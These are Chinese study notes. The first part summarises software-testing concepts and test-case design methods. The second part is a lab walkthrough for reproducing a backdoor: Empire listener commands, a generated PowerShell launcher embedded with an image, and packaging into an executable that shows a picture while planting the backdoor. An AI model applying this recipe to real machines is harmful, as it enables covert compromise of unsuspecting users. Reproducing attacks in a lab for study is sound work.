软件测试
按技术分,白盒测试和黑盒测试
白盒测试是通过对程序内部结构的分析、检测来寻找问题,如果已知产品的内部活动方式,可以通过白盒测试技术来测试它的内部活动是否符合设计要求
黑盒测试是通过对软件的外部表现来发现其错误和缺陷。是在已知产品需求的情况下,通过测试来检验是否都被满足的测试方法。对于软件测试而言,黑盒测试把程序看成一个黑盒子,完全不考虑程序的内部结构和处理过程。
按测试技术分:静态测试和动态测试;按测试阶段分:单元测试、集成测试、确认测试、系统测试、验收测试;按测试内容分:功能测试、压力测试、性能测试、可靠性测试、安全性测试、兼容性测试、安装测试、灾难性恢复测试、回归测试。
测试用例的几种常见方法:等价类划分,用于单个输入条件,输入为数值型的情况;边界值,适用于单个输入,类型可以是数值、字符等;错误推测法,测试设计人员的测试经验相关;因果图法,考虑输入的组合,适用于多个输入条件相关有关联又相互约束的情况;判定表驱动法,适合于解决多个逻辑条件的组合,将各种逻辑条件的组合罗列出来,避免遗漏,不能表达重复的操作。
测试用例要素:标题、步骤、预期结果
产品能力测试:检测能力测试;防御能力测试;分析能力测试。
永生之火后门复现
平台:Windows+Kali
工具:图片一张、Empire、0dayplay
首先,进入Empire的setup目录,执行install.sh
,完成Empire的安装。然后执行commands
listeners
use listener http
set Name flagellantX
execute
launcher powershell flagellantX
打开www.browserling.com/tools/image-to-base64,把图片转换成base64,将base64的编码值复制到利用代码段位置。接着使用launcher powershell flagellantX命令生成一下powershell,并将powershell复制到利用代码的代码段。将所有的东西copy到Script Encoder,将右边框Convert好的代码所有复制,并打包成一个可执行文件。
然后把可执行文件放到windows7里面,执行之后会自动弹出选定的图片,可见后门复现成功。
